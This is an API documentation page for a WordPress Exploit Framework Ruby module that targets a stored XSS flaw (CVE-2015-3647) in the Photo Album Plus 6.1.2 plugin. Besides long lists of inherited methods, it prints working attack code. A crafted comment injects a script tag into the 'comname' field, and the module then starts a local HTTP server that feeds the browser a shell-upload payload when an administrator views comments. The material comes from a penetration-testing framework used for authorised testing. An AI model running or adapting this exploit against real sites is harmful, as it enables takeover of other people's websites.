Class: Wpxf::Exploit::PhotoAlbumPlusXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializePhotoAlbumPlusXssShellUpload

Returns a new instance of PhotoAlbumPlusXssShellUpload.



10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 10

def initialize
  super

  update_info(
    name: 'Photo Album Plus 6.1.2 XSS Shell Upload',
    desc: 'The vulnerability exists due to the absence of filtration of '\
          'user-supplied input passed via the "comname" and "comemail" '\
          'HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/'\
          'wppa-ajax-front.php" script when posting a comment.'\
          "\n"\
          'A remote attacker can post a specially crafted message '\
          'containing malicious HTML or script code and execute it in '\
          'the administrator\'s browser in context of the vulnerable '\
          'website, when an administrator views images or comments in '\
          'the administrative interface.',
    author: [
      'High-Tech Bridge Security Research Lab', # Discovery and disclosure
      'rastating'                               # WPXF module
    ],
    references: [
      ['CVE', '2015-3647'],
      ['WPVDB', '7996'],
      ['URL', 'https://www.htbridge.com/advisory/HTB23257']
    ],
    date: 'May 20 2015'
  )
end

Instance Method Details

#ajax_urlObject 



46
47
48
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 46

def ajax_url
  normalize_uri(plugin_url, 'wppa-ajax-front.php')
end

#checkObject 



38
39
40
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 38

def check
  check_plugin_version_from_readme('wp-photo-album-plus', '6.1.3')
end

#plugin_urlObject 



42
43
44
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 42

def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-photo-album-plus')
end

#post_scriptObject 



50
51
52
53
54
55
56
57
58
59
60
61
62
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 50

def post_script
  execute_post_request(
    url: ajax_url,
    body: {
      'action'      => 'wppa',
      'wppa-action' => 'do-comment',
      'photo-id'    => Utility::Text.rand_numeric(3),
      'comment'     => Utility::Text.rand_alpha(50),
      'comemail'    => "#{Utility::Text.rand_alpha(10)}@#{Utility::Text.rand_alpha(10)}.com",
      'comname'     => "#{Utility::Text.rand_alpha(8)}<script>#{xss_include_script}</script>"
    }
  )
end

#runObject 



64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
 
# File 'lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb', line 64

def run
  return false unless super

  # Success will determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = post_script

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed upon visiting /wp-admin/admin.php?page=wppa_manage_comments"
  start_http_server

  return @success
end